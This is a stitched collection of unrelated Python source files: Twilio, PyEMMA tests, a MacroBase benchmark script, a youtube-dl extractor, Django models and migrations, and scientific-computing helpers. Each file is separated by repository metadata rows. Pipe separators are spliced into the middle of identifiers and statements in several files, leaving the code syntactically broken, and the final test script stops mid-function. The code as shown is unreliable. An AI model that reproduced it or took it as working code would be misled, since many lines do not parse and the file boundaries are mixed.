# To set up environmental variables, see http://twil.io/secure
account = os.environ['TWILIO_ACCOUNT_SID']
token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account, token)
credential = client.notify \
.credentials("CRXXXXX | XXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.update(friendly_name="MyCredential",
sandbox=True)
print(credential.friendly_name)
|
markovmodel/PyEMMA | pyemma/coordinates/tests/test_pipeline.py | Python | lgpl-3.0 | 7,347 | 0.002178 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import os
import numpy as np
from pyemma.coordinates.data import DataInMemory
from pyemma.coordinates.data import MDFeaturizer
from pyemma.coordinates import api
import msmtools.generation as msmgen
import tempfile
import pkg_resources
from pyemma.util.files import TemporaryDirectory
import pyemma.coordinates as coor
class TestPipeline(unittest.TestCase):
@classmethod
def setUpClass(cls):
path = pkg_resources.resource_filename(__name__, 'data') + os.path.sep
cls.pdb_file = os.path.join(path, 'bpti_ca.pdb')
cls.feat = MDFeaturizer(cls.pdb_file)
cls.feat.add_all()
cls.traj_files = [
os.path.join(path, 'bpti_001-033.xtc'),
os.path.join(path, 'bpti_067-100.xtc')
]
# generate HMM with two gaussians
p = np.array([[0.99, 0.01], [0.01, 0.99]])
t = 10000
means = [np.array([-1, 1]), np.array([1, -1])]
widths = [np.array([0.3, 2]), np.array([0.3, 2])]
# continuous trajectory
x = np.zeros((t, 2))
# hidden trajectory
dtraj = msmgen.generate_traj(p, t)
for t in range(t):
s = dtraj[t]
x[t, 0] = widths[s][0] * np.random.randn() + means[s][0]
x[t, 1] = widths[s][1] * np.random.randn() + means[s][1]
cls.generated_data = x
cls.generated_lag = 10
def test_is_parametrized(self):
# construct pipeline with all possible transformers
p = api.pipeline(
[
api.source(self.traj_files, top=self.pdb_file),
api.tica(),
api.pca(),
api.cluster_kmeans(k=50),
api.cluster_regspace(dmin=50),
api.cluster_uniform_time(k=20)
], run=False
)
self.assertFalse(p._is_estimated(), "If run=false, the pipeline should not be parametrized.")
p.parametrize()
self.assertTrue(p._is_estimated(), "If parametrized was called, the pipeline should be parametrized.")
def test_np_reader_in_pipeline(self):
with TemporaryDirectory() as td:
file_name = os.path.join(td, "test.npy")
data = np.random.random((100, 3))
np.save(file_name, data)
reader = api.source(file_name)
p = api.pipeline(reader, run=False, stride=2, chunksize=5)
p.parametrize()
def test_add_element(self):
# start with empty pipeline without auto-parametrization
p = api.pipeline([], run=False)
# add some reader
reader = api.source(self.traj_files, top=self.pdb_file)
p.add_element(reader)
p.parametrize()
# get the result immediately
out1 = reader.get_output()
# add some kmeans
kmeans = api.cluster_kmeans(k=15)
p.add_element(kmeans)
p.parametrize()
# get the result immediately
kmeans1 = kmeans.get_output()
# get reader output again
out2 = reader.get_output()
p.add_element(api.cluster_kmeans(k=2))
p.parametrize()
# get kmeans output again
kmeans2 = kmeans.get_output()
# check if add_element changes the intermediate results
np.testing.assert_array_equal(out1[0], out2[0])
np.testing.assert_array_equal(out1[1], out2[1])
np.testing.assert_array_equal(kmeans1[0], kmeans2[0])
np.testing.assert_array_equal(kmeans1[1], kmeans2[1])
def test_set_element(self):
reader = api.source(self.traj_files, top=self.pdb_file)
pca = api.pca()
p = api.pipeline([reader, pca])
self.assertTrue(p._is_estimated())
pca_out = pca.get_output()
tica = api.tica(lag=self.generated_lag)
# replace pca with tica
p.set_element(1, tica)
self.assertFalse(p._is_estimated(), "After replacing an element, the pipeline should not be parametrized.")
p.parametrize()
tica_out = tica.get_output()
# check if replacement actually happened
self.assertFalse(np.array_equal(pca_out[0], tica_out[0]),
"The output should not be the same when the method got replaced.")
@unittest.skip("Known to be broken")
def test_replace_data_source(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
reader_gen = DataInMemory(data=self.generated_data)
kmeans = api.cluster_kmeans(k=10)
assert hasattr(kmeans, '_chunks')
p = api.pipeline([reader_xtc, kmeans])
out1 = kmeans.get_output()
# replace source
print(reader_gen)
| p.set_element(0, reader_gen)
assert hasattr(kmeans, '_chunks')
p.parametrize()
out2 = kmeans.get_output()
self.assertFalse(np.array_equal(out1, out2), "Data source changed, so should the resulting clusters.")
def test_discretizer(self):
reader_gen = DataInMemory(data=self.generated_data)
# check if exception safe
| api.discretizer(reader_gen)._chain[-1].get_output()
api.discretizer(reader_gen, transform=api.tica())._chain[-1].get_output()
api.discretizer(reader_gen, cluster=api.cluster_uniform_time())._chain[-1].get_output()
api.discretizer(reader_gen, transform=api.pca(), cluster=api.cluster_regspace(dmin=10))._chain[-1].get_output()
def test_no_cluster(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
# only reader
api.pipeline(reader_xtc)
reader_xtc.get_output()
# reader + pca / tica
tica = api.tica()
pca = api.pca()
api.pipeline([reader_xtc, tica])._chain[-1].get_output()
api.pipeline([reader_xtc, pca])._chain[-1].get_output()
def test_no_transform(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
api.pipeline([reader_xtc, api.cluster_kmeans(k=10)])._chain[-1].get_output()
api.pipeline([reader_xtc, api.cluster_regspace(dmin=10)])._chain[-1].get_output()
api.pipeline([reader_xtc, api.cluster_uniform_time()])._chain[-1].get_output()
def test_chunksize(self):
reader_xtc = api.source(self.traj_files, top=self.pdb_file)
chunksize = 1001
chain = [reader_xtc, api.tica(), api.cluster_mini_batch_kmeans(batch_size=0.3, k=3)]
p = api.pipeline(chain, chunksize=chunksize, run=False)
assert p.chunksize == chunksize
for e in p._chain:
assert e.chunksize == chunksize
if __name__ == "__main__":
unittest.main()
|
stanford-futuredata/macrobase | tools/bench/contextual/contextual_execute_workflows.py | Python | apache-2.0 | 12,283 | 0.002198 | import argparse
import json
import os
from time import strftime
testing_dir = "workflows"
batch_template_conf_file = "contextual_batch_template.conf"
streaming_template_conf_file = "contextual_streaming_template.conf"
default_args = {
"macrobase.analysis.minOIRatio": 3.0,
"macrobase.analysis.minSupport": 0.5,
"macrobase.analysis.usePercentile": "true",
"macrobase.analysis.targetPercentile": 0.99,
"macrobase.analysis.useZScore": "false",
"macrobase.loader.db.user": os.getenv('USER', None),
"macrobase.loader.db.password": None,
"macrobase.analysis.zscore.threshold": 5.0,
"macrobase.analysis.streaming.inputReservoirSize": 10000,
"macrobase.analysis.streaming.scoreReservoirSize": 10000,
"macrobase.analysis.streaming.inlierItemSummarySize": 10000,
"macrobase.analysis.streaming.outlierItemSummarySize": 10000,
"macrobase.analysis.streaming.summaryUpdatePeriod": 100000,
"macrobase.analysis.streaming.modelUpdatePeriod": 100000,
"macrobase.analysis.streaming.useRealTimePeriod": "false",
"macrobase.analysis.streaming.useTupleCountPeriod": "true",
"macrobase.analysis.streaming.warmupCount": 50000,
"macrobase.analysis.streaming.decayRate": 0.01,
"macrobase.analysis.mcd.alpha": 0.5,
"macrobase.analysis.mcd.stoppingDelta": 0.001,
"macrobase.analysis.contextual.denseContextTau": 0.1,
"macrobase.analysis.contextual.numIntervals": 10,
}
def process_config_parameters(config_parameters):
for config_parameter_type in config_parameters:
if type(config_parameters[config_parameter_type]) == list:
config_parameters[config_parameter_type] = ", ".join(
[str(para) for para in config_parameters[config_parameter_type]])
def create_config_file(config_parameters, conf_file):
template_conf_file = batch_template_conf_file \
if config_parameters["isBatchJob"] else streaming_template_conf_file
template_conf_contents = open(template_conf_file, 'r').read()
conf_contents = template_conf_contents % config_parameters
with open(conf_file, 'w') as f:
f.write(conf_contents)
def parse_results(results_file):
times = dict()
num_itemsets = 0
num_iterations = 0
tuples_per_second = 0.0
tuples_per_second_no_itemset_mining = 0.0
itemsets = list()
with open(results_file, 'r') as f:
lines = f.read().split('\n')
for i in xrange(len(lines)):
line = lines[i]
if line.startswith("DEBUG"):
if "time" in line and "...ended" in line:
line = line.split("...ended")[1].strip()
line_tokens = line.split("(")
time_type = line_tokens[0].strip()
time = int(line_tokens[1][6:-4])
times[time_type] = time
elif "itemsets" in line:
line = lin | e.split("Number of itemsets:")[1].strip()
num_itemsets = int(line | )
elif "iterations" in line:
line = line.split(
"Number of iterations in MCD step:")[1].strip()
num_iterations = int(line)
elif "Tuples / second w/o itemset mining" in line:
line = line.split("Tuples / second w/o itemset mining = ")[1]
tuples_per_second_no_itemset_mining = float(
line.split("tuples / second")[0].strip())
elif "Tuples / second" in line:
line = line.split("Tuples / second = ")[1]
tuples_per_second = float(
line.split("tuples / second")[0].strip())
if "Columns" in line:
j = i + 1
itemset = dict()
while lines[j].strip() != '':
itemset_str = lines[j].lstrip()
[itemset_type, itemset_value] = itemset_str.split(": ")
if itemset_type != "" and itemset_value != "":
itemset[itemset_type] = itemset_value
j += 1
if itemset != {}:
itemsets.append(itemset)
return (times, num_itemsets, num_iterations, itemsets, tuples_per_second,
tuples_per_second_no_itemset_mining)
def separate_contextual_results(results_file):
contextual_results_file = results_file + "_contextual"
g = open(contextual_results_file,'w')
with open(results_file, 'r') as f:
lines = f.read().split('\n')
for i in xrange(len(lines)):
line = lines[i]
if 'macrobase.analysis.BatchAnalyzer' in line or 'macrobase.analysis.contextualoutlier' in line:
g.write(line + '\n')
g.close()
def get_stats(value_list):
value_list = [float(value) for value in value_list]
mean = sum(value_list) / len(value_list)
stddev = (sum([(value - mean)**2 for value in value_list]) /
len(value_list)) ** 0.5
return mean, stddev
def run_workload(config_parameters, number_of_runs, print_itemsets=True):
sub_dir = os.path.join(os.getcwd(),
testing_dir,
config_parameters["macrobase.query.name"],
strftime("%m-%d-%H:%M:%S"))
os.system("mkdir -p %s" % sub_dir)
# For now, we only run metrics with MCD and MAD: MCD for
# dimensionalities greater than 1, MAD otherwise.
dim = (len(config_parameters["macrobase.loader.targetHighMetrics"]) +
len(config_parameters["macrobase.loader.targetLowMetrics"]))
if dim > 1:
config_parameters["macrobase.analysis.detectorType"] = "MCD"
else:
config_parameters["macrobase.analysis.detectorType"] = "MAD"
process_config_parameters(config_parameters)
conf_file = "batch.conf" if config_parameters["isBatchJob"] \
else "streaming.conf"
conf_file = os.path.join(sub_dir, conf_file)
#create
config_parameters["macrobase.analysis.contextual.outputFile"] = os.path.join(sub_dir, "output.txt")
create_config_file(config_parameters, conf_file)
cmd = "pipeline" if config_parameters["isBatchJob"] else "streaming"
all_times = dict()
all_num_itemsets = list()
all_num_iterations = list()
all_itemsets = set()
all_tuples_per_second = list()
all_tuples_per_second_no_itemset_mining = list()
for i in xrange(number_of_runs):
results_file = os.path.join(sub_dir, "results%d.txt" % i)
macrobase_cmd = '''java ${{JAVA_OPTS}} \\
-cp "src/main/resources/:target/classes:target/lib/*:target/dependency/*" \\
macrobase.MacroBase {cmd} {conf_file} \\
> {results_file} 2>&1'''.format(
cmd=cmd, conf_file=conf_file, results_file=results_file)
print 'running the following command:'
print macrobase_cmd
os.system("cd ..; cd ..; %s" % macrobase_cmd)
separate_contextual_results(results_file)
#for inspecting contextual outlier performance
(times, num_itemsets, num_iterations, itemsets,
tuples_per_second, tuples_per_second_no_itemset_mining) = parse_results(results_file)
for time_type in times:
if time_type not in all_times:
all_times[time_type] = list()
all_times[time_type].append(times[time_type])
all_num_itemsets.append(num_itemsets)
all_num_iterations.append(num_iterations)
for itemset in itemsets:
all_itemsets.add(frozenset(itemset.items()))
all_tuples_per_second.append(tuples_per_second)
all_tuples_per_second_no_itemset_mining.append(tuples_per_second_no_itemset_mining)
mean_and_stddev_times = dict()
for time_type in all_times:
mean_and_stddev_times[time_type] = get_stats(all_times[time_type])
mean_num_itemsets, stddev_num_itemsets = get_stats(all_num_itemsets)
mean_num_iterations, stddev_num_iterations = get_stats(all_num_iterations)
mean_tuples_per_second, stddev_tuples_per_second = \
get_stats(all_tuples_per_second)
mean_tps_no_itemset_mining, stddev_tps_no_item |
marxin/youtube-dl | youtube_dl/extractor/tnaflix.py | Python | unlicense | 2,854 | 0.002803 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
parse_duration,
fix_xml_ampersands,
)
class TNAFlixIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?tnaflix\.com/(?P<cat_id>[\w-]+)/(?P<display_id>[\w-]+)/video(?P<id>\d+)'
_TITLE_REGEX = r'<title>(.+?) - TNAFlix Porn Videos</title>'
_DESCRIPTION_REGEX = r'<h3 itemprop="description">([^<]+)</h3>'
_CONFIG_REGEX = r'flashvars\.config\s*=\s*escape\("([^"]+)"'
_TEST = {
'url': 'http://www.tnaflix.com/porn-stars/Carmella-Decesare-striptease/video553878',
'md5': 'ecf3498417d09216374fc5907f9c6ec0',
'info_dict': {
'id': '553878',
'display_id': 'Carmella-Decesare-striptease',
'ext': 'mp4',
'title': 'Carmella Decesare - striptease',
'description': '',
'thumbnail': 're:https?://.*\.jpg$',
'duration': 91,
'age_limit': 18,
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id')
webpage = self._download_webpage(url, display_id)
title = self._html_search_regex(
self._TITLE_REGEX, webpage, 'title') if self._TITLE_REGEX else self._og_search_title(webpage)
description = self._html_search_regex(
self._DESCRIPTION_REGEX, webpage, 'description', fatal=False, default='')
age_limit = self._rta_search(webpage)
duration = self._html_search_meta('duration', webpage, 'duration', default=None)
if duration:
duration = parse_duration(duration[1:])
cfg_url = self._prot | o_relative_url(self._html_search_regex(
self._CONFIG_REGEX, webpage, 'flashvars.config'), 'http:')
| cfg_xml = self._download_xml(
cfg_url, display_id, note='Downloading metadata',
transform_source=fix_xml_ampersands)
thumbnail = cfg_xml.find('./startThumb').text
formats = []
for item in cfg_xml.findall('./quality/item'):
video_url = re.sub('speed=\d+', 'speed=', item.find('videoLink').text)
format_id = item.find('res').text
fmt = {
'url': video_url,
'format_id': format_id,
}
m = re.search(r'^(\d+)', format_id)
if m:
fmt['height'] = int(m.group(1))
formats.append(fmt)
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'age_limit': age_limit,
'formats': formats,
}
|
mishbahr/djangocms-twitter2 | djangocms_twitter/migrations/0001_initial.py | Python | bsd-3-clause | 2,646 | 0.003779 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import connected_accounts.fields
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('connected_accounts', '0001_initial'),
('cms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Twitter',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('screen_name', models.CharField(help_text='You may create an embedded timeline for any public Twitter user. By default, the "Connected Account" tweets are fetched.', max_length=100, null=True, verbose_name='Twitter Username', blank=True)),
('search_query', models.CharField(help_text='You may create a search timeline for any query or #hashtag..', max_length=255, verbose_name='Search Query', blank=True)),
('no_of_items', models.IntegerField(default=20, help_text='Select the number of items this block should display (max 20)', verbose_name='Items to Display', validators=[django.core.validators.MaxValueValidator(20), django.core.validators.MinValueValidator(1)])),
('timeline_source', models.CharField(default='user', help_text="You can em | bed a timeline for Tweets from an individual user, a u | ser's favorites or any search query or hashtag.", max_length=50, verbose_name='Available Timelines', choices=[('user', 'User Timeline'), ('favorites', 'Favorites'), ('search', 'Search Query')])),
('show_avatar', models.BooleanField(default=True, help_text='Shows or hides the avatar image.', verbose_name='Show Avatar?')),
('show_username', models.BooleanField(default=True, help_text='Shows or hides the username text.', verbose_name='Show Username?')),
('follow_button', models.BooleanField(default=True, help_text='Append a follow button to the listing.', verbose_name='Show Follow Button?')),
('plugin_template', models.CharField(default=b'djangocms_twitter/default.html', max_length=150, verbose_name='Design', choices=[(b'djangocms_twitter/default.html', 'Default')])),
('account', connected_accounts.fields.AccountField(verbose_name='Connected Account', to='connected_accounts.Account', provider='twitter', help_text='Select a connected Twitter account or connect to a new account.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
|
datagutten/comics | comics/core/models.py | Python | agpl-3.0 | 4,089 | 0 | import datetime
import os
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.core.urlresolvers import reverse
from django.db import models
from django.utils import timezone
from comics.core.managers import ComicManager
class Comic(models.Model):
LANGUAGES = (
('en', 'English'),
('no', 'Norwegian'),
)
# Required fields
name = models.CharField(
max_length=100,
help_text='Name of the comic')
slug = models.SlugField(
max_length=100, unique=True,
verbose_name='Short name',
help_text='For file paths and URLs')
language = models.CharField(
max_length=2, choices=LANGUAGES,
help_text='The language of the comic')
# Optional fields
url = models.URLField(
verbose_name='URL', blank=True,
help_text='URL to the official website')
active = models.BooleanField(
default=True,
help_text='Wheter the comic is still being crawled')
start_date = models.DateField(
blank=True, null=True,
help_text='First published at')
end_date = models.DateField(
blank=True, null=True,
help_text='Last published at, if comic has been cancelled')
rights = models.CharField(
max_length=100, blank=True,
help_text='Author, copyright, and/or licensing information')
# Automatically populated fields
added = models.DateTimeField(
auto_now_add=True,
help_text='Time the comic was added to the site')
objects = ComicManager()
class Meta:
db_table = 'comics_comic'
ordering = ['name']
def __unicode__(self):
return self.slug
def get_absolute_url(self):
return reverse('comic_latest', kwargs={'comic_slug': self.slug})
def get_redirect_url(self):
return reverse('comic_website', kwargs={'comic_slug': self.slug})
def is_new(self):
some_time_ago = timezone.now() - datetime.timedelta(
days=settings.COMICS_NUM_DAYS_COMIC_IS_NEW)
return self.added > some_time_ago
class Release(models.Model):
# Required fields
comic = models.ForeignKey(Comic)
pub_date = models.DateField(verbose_name='publication date', db_index=True)
images = models.ManyToManyField('Image', related_name='releases')
# Automatically populated fields
fetched = models.DateTimeField(auto_now_add=True, db_index=True)
class Meta:
db_table = 'comics_release'
get_latest_by = 'pub_date'
def __unicode__(self):
return u'Release %s/%s' % (self.comic.slug, self.pub_date)
def get_absolute_url(self):
return reverse('comic_day', kwargs={
'comic_slug': se | lf.comic.slug,
'year': self.pub_date.year,
'month': se | lf.pub_date.month,
'day': self.pub_date.day,
})
def get_ordered_images(self):
if not getattr(self, '_ordered_images', []):
self._ordered_images = list(self.images.order_by('id'))
return self._ordered_images
# Let all created dirs and files be writable by the group
os.umask(0002)
image_storage = FileSystemStorage(
location=settings.MEDIA_ROOT, base_url=settings.MEDIA_URL)
def image_file_path(instance, filename):
return u'%s/%s/%s' % (instance.comic.slug, filename[0], filename)
class Image(models.Model):
# Required fields
comic = models.ForeignKey(Comic)
file = models.ImageField(
storage=image_storage, upload_to=image_file_path,
height_field='height', width_field='width')
checksum = models.CharField(max_length=64, db_index=True)
# Optional fields
title = models.CharField(max_length=255, blank=True)
text = models.TextField(blank=True)
# Automatically populated fields
fetched = models.DateTimeField(auto_now_add=True)
height = models.IntegerField()
width = models.IntegerField()
class Meta:
db_table = 'comics_image'
def __unicode__(self):
return u'Image %s/%s...' % (self.comic.slug, self.checksum[:8])
|
npinto/Oger | Oger/gradient/__init__.py | Python | gpl-3.0 | 1,376 | 0.003634 | """
This subpackage contains nodes and trainers for gradient based learning.
Its purpose is to automate backpropagation and gradient calculation for models
that can be trained using gradient methods. This allows complex architectures
to be trained using external optimizers that can use gradient and loss
information.
The main building block is the BackpropNode that takes a flow of nodes that are
supported by the gradient extension and uses a trainer object to optimize the
parameters of the nodes in the flow.
Some of the nodes that | are currently supported are the PerceptronNode and the
ERBMNode. Examples of optimization algorithms that have been wrapped into
trainer objects are gradient descent, RPROP, conjugate gradient and BFGS.
The 'models' package contains some pre-defined architectures that use the
gradient package for training.
"""
from gradient_nodes import (GradientExtensionNode, BackpropNode, GradientPerceptronNode, GradientRBMNode)
from trainers import (CGTrainer, BFGSTrainer, RPROPTrainer, Gradi | entDescentTrainer, LBFGSBTrainer)
from models import (MLPNode, AutoencoderNode)
del gradient_nodes
del trainers
del models
__all__ = ['GradientExtensionNode', 'BackpropNode', 'GradientPerceptronNode', 'GradientRBMNode',
'CGTrainer', 'BFGSTrainer', 'RPROPTrainer', 'GradientDescentTrainer', 'LBFGSBTrainer', 'MLPNode,', 'AutoencoderNode']
|
geodynamics/burnman | burnman/tools/chemistry.py | Python | gpl-2.0 | 8,056 | 0.000372 | # This file is part of BurnMan - a thermoelastic and thermodynamic toolkit
# for the Earth and Planetary Sciences
# Copyright (C) 2012 - 2021 by the BurnMan team, released under the GNU
# GPL v2 or later.
# This module provides higher level chemistry-related functions.
from __future__ import absolute_import
import numpy as np
from scipy.optimize import fsolve
from .. import constants
# Import common lower level functions for backwards compatibility
from ..utils.chemistry import dictionarize_formula, formula_mass
from ..utils.chemistry import formula_to_string, site_occupancies_to_strings
def fugacity(standard_material, assemblage):
"""
Parameters
----------
standard_material: burnman.Material object
set_method and set_state should already have been used
material must have a formula as a dictionary parameter
assemblage: burnman.Composite object
set_method and set_state should already have been used
Returns
-------
fugacity : float
Value of the fugacity of the component with respect to
the standard material
"""
component_formula = standard_material.params['formula']
chemical_potential = assemblage.chemical_potential([component_formula])[0]
fugacity = np.exp((chemical_potential - standard_material.gibbs)
/ (constants.gas_constant * assemblage.temperature))
return fugacity
def relative_fugacity(compo | nent_formula, assemblage, reference_assemblage):
"""
Parameters
----------
component_formula: dictionary
Chemical formula for which to compute the relative fugacity.
assemblage: burnman.Composite object
se | t_method and set_state should already have been used.
reference_assemblage: burnman.Composite object
set_method and set_state should already have been used.
Returns
-------
relative_fugacity : float
Value of the fugacity of the component in the assemblage
with respect to the reference_assemblage.
"""
chemical_potential = assemblage.chemical_potential([component_formula])[0]
reference_chemical_potential = reference_assemblage.chemical_potential([component_formula])[0]
relative_fugacity = np.exp((chemical_potential
- reference_chemical_potential)
/ (constants.gas_constant
* assemblage.temperature))
return relative_fugacity
def equilibrium_pressure(minerals, stoichiometry, temperature,
pressure_initial_guess=1.e5):
"""
Given a list of minerals, their reaction stoichiometries
and a temperature of interest, compute the
equilibrium pressure of the reaction.
Parameters
----------
minerals : list of minerals
List of minerals involved in the reaction.
stoichiometry : list of floats
Reaction stoichiometry for the minerals provided.
Reactants and products should have the opposite signs [mol]
temperature : float
Temperature of interest [K]
pressure_initial_guess : optional float
Initial pressure guess [Pa]
Returns
-------
pressure : float
The equilibrium pressure of the reaction [Pa]
"""
def eqm(P, T):
gibbs = 0.
for i, mineral in enumerate(minerals):
mineral.set_state(P[0], T)
gibbs = gibbs + mineral.gibbs * stoichiometry[i]
return gibbs
pressure = fsolve(eqm, [pressure_initial_guess], args=(temperature))[0]
return pressure
def equilibrium_temperature(minerals, stoichiometry, pressure, temperature_initial_guess=1000.):
"""
Given a list of minerals, their reaction stoichiometries
and a pressure of interest, compute the
equilibrium temperature of the reaction.
Parameters
----------
minerals : list of minerals
List of minerals involved in the reaction.
stoichiometry : list of floats
Reaction stoichiometry for the minerals provided.
Reactants and products should have the opposite signs [mol]
pressure : float
Pressure of interest [Pa]
temperature_initial_guess : optional float
Initial temperature guess [K]
Returns
-------
temperature : float
The equilibrium temperature of the reaction [K]
"""
def eqm(T, P):
gibbs = 0.
for i, mineral in enumerate(minerals):
mineral.set_state(P, T[0])
gibbs = gibbs + mineral.gibbs * stoichiometry[i]
return gibbs
temperature = fsolve(eqm, [temperature_initial_guess], args=(pressure))[0]
return temperature
def invariant_point(minerals_r1, stoichiometry_r1,
minerals_r2, stoichiometry_r2,
pressure_temperature_initial_guess=[1.e9, 1000.]):
"""
Given a list of minerals, their reaction stoichiometries
and a pressure of interest, compute the
equilibrium temperature of the reaction.
Parameters
----------
minerals : list of minerals
List of minerals involved in the reaction.
stoichiometry : list of floats
Reaction stoichiometry for the minerals provided.
Reactants and products should have the opposite signs [mol]
pressure : float
Pressure of interest [Pa]
temperature_initial_guess : optional float
Initial temperature guess [K]
Returns
-------
temperature : float
The equilibrium temperature of the reaction [K]
"""
def eqm(PT):
P, T = PT
gibbs_r1 = 0.
for i, mineral in enumerate(minerals_r1):
mineral.set_state(P, T)
gibbs_r1 = gibbs_r1 + mineral.gibbs * stoichiometry_r1[i]
gibbs_r2 = 0.
for i, mineral in enumerate(minerals_r2):
mineral.set_state(P, T)
gibbs_r2 = gibbs_r2 + mineral.gibbs * stoichiometry_r2[i]
return [gibbs_r1, gibbs_r2]
pressure, temperature = fsolve(eqm, pressure_temperature_initial_guess)
return pressure, temperature
def hugoniot(mineral, P_ref, T_ref, pressures, reference_mineral=None):
"""
Calculates the temperatures (and volumes) along a Hugoniot
as a function of pressure according to the Hugoniot equation
U2-U1 = 0.5*(p2 - p1)(V1 - V2) where U and V are the
internal energies and volumes (mass or molar) and U = F + TS
Parameters
----------
mineral : mineral
Mineral for which the Hugoniot is to be calculated.
P_ref : float
Reference pressure [Pa]
T_ref : float
Reference temperature [K]
pressures : numpy array of floats
Set of pressures [Pa] for which the Hugoniot temperature
and volume should be calculated
reference_mineral : mineral
Mineral which is stable at the reference conditions
Provides an alternative U_0 and V_0 when the reference
mineral transforms to the mineral of interest at some
(unspecified) pressure.
Returns
-------
temperatures : numpy array of floats
The Hugoniot temperatures at pressure
volumes : numpy array of floats
The Hugoniot volumes at pressure
"""
def Ediff(T, mineral, P, P_ref, U_ref, V_ref):
mineral.set_state(P, T[0])
U = mineral.helmholtz + T[0] * mineral.S
V = mineral.V
return (U - U_ref) - 0.5 * (P - P_ref) * (V_ref - V)
if reference_mineral is None:
reference_mineral = mineral
reference_mineral.set_state(P_ref, T_ref)
U_ref = reference_mineral.helmholtz + T_ref * reference_mineral.S
V_ref = reference_mineral.V
temperatures = np.empty_like(pressures)
volumes = np.empty_like(pressures)
for i, P in enumerate(pressures):
temperatures[i] = fsolve(
Ediff, [T_ref], args=(mineral, P, P_ref, U_ref, V_ref))[0]
volumes[i] = mineral.V
return temperatures, volumes
|
brentjens/pyautoplot | test/testf0seqnrcalculation.py | Python | gpl-3.0 | 6,014 | 0.011141 | """
Example usage:
python3 testf0seqnrcalculation.py 548659 \
../testdata/sample_data_548659/L548659.parset \
../testdata/sample_data_548659/file-sizes.txt \
../testdata/sample_data_548659/f0seqnr-sizes.txt
"""
import os
import sys
sys.path.append("../scripts")
import create_html
def test_main(in_sas_id, in_parset_path, in_file_sizes_path, in_f0seqnr_sizes_path):
    """Run the f0seqnr completeness analysis end-to-end and print a report.

    Fix: removed dataset-extraction artifacts (' | ') that had been spliced
    into the 'in_sas_id' parameter name and the 'file_sizes_dict' assignment,
    which made the function a syntax error.

    Parameters:
        in_sas_id: observation SAS id (int).
        in_parset_path: path to the observation parset file.
        in_file_sizes_path: path to the file-sizes listing.
        in_f0seqnr_sizes_path: path to the f0seqnr-sizes listing.

    Side effects: prints the analysis to stdout and writes ./index.html.
    Returns True (kept for the caller's success/failure reporting).
    """
    result = True
    # Parse the parset and the two size listings via the production code path.
    parset = create_html.parset_summary(in_sas_id, in_parset_path)
    file_sizes_dict = create_html.parse_file_sizes(in_file_sizes_path)
    analysed_file_sizes_dict = create_html.file_size_analysis(parset, file_sizes_dict)
    highest_file_size_mb = analysed_file_sizes_dict['max_ms_size_mb'].max()
    # f0seqnr files are keyed by their containing directory, hence os.path.dirname.
    f0seqnr_sizes_dict = create_html.parse_file_sizes(in_f0seqnr_sizes_path, os.path.dirname)
    f0seqnr_completeness_dict = create_html.f0seqnr_size_analysis(parset, f0seqnr_sizes_dict)
    f0seqnr_completeness_statistics = create_html.calculate_statistics(f0seqnr_completeness_dict.values(), (100.0, None))
    print("Relevant parset details:")
    print("clock_mhz: ", parset['clock_mhz'])
    print("start-time: ", parset['start_time'])
    print("stop-time: ", parset['stop_time'])
    print("block_size: ", parset['block_size'])
    print("nr_integrations_per_block: ", parset['nr_integrations_per_block'])
    print("nr_blocks_per_integration: ", parset['nr_blocks_per_integration'])
    print("nr_integration_periods: ", parset['nr_integration_periods'])
    print("Correlator locations: ", "\n".join(parset['correlator_locations']))
    print("Beamformer locations: ", "\n".join(parset['beamformer_locations']))
    print("\nContent of [file_sizes_dict]:")
    for data_product_folder, (_, _, file_size_in_mb) in file_sizes_dict.items():
        print(data_product_folder, " (", file_size_in_mb, "MB)")
    print("\nContent of [analysed_file_sizes_dict]:")
    print("max_ms_size_mb: ", analysed_file_sizes_dict['max_ms_size_mb'])
    print("max_raw_size_mb: ", analysed_file_sizes_dict['max_raw_size_mb'])
    print("missing_data_sets: ", analysed_file_sizes_dict['missing_data_sets'])
    print("odd_sized_data_sets: ", analysed_file_sizes_dict['odd_sized_data_sets'])
    print("percentage_complete: ", analysed_file_sizes_dict['percentage_complete'])
    print("\nContent of [f0seqnr_sizes_dict]:")
    for data_product_folder, (_, _, nr_integration_periods_in_file) in f0seqnr_sizes_dict.items():
        print(data_product_folder, " (", nr_integration_periods_in_file, ")")
    print("\nContent of [f0seqnr_completeness_dict]:")
    for data_product_folder, completeness_value in f0seqnr_completeness_dict.items():
        print(data_product_folder, " (", completeness_value, ")")
    print("\nTotal average completeness: ", f0seqnr_completeness_statistics, " over ", len(f0seqnr_completeness_dict.values()), " number of items")
    # Three alternative incompleteness reports: original size-based method,
    # f0seqnr-based method, and relative-to-largest-file method.
    print("\nIncomplete datasets according to original method (odd_sized_data_sets (=) abs(float(data_size_mb)/float(max_ms_size_mb) -1.0) > 0.01):")
    for (name, size) in sorted(analysed_file_sizes_dict['odd_sized_data_sets']):
        print("Dataset: ", name, " Size: ", size, "MB")
    print("\nIncomplete datasets according to f0seqnr method (completeness_value < 100):")
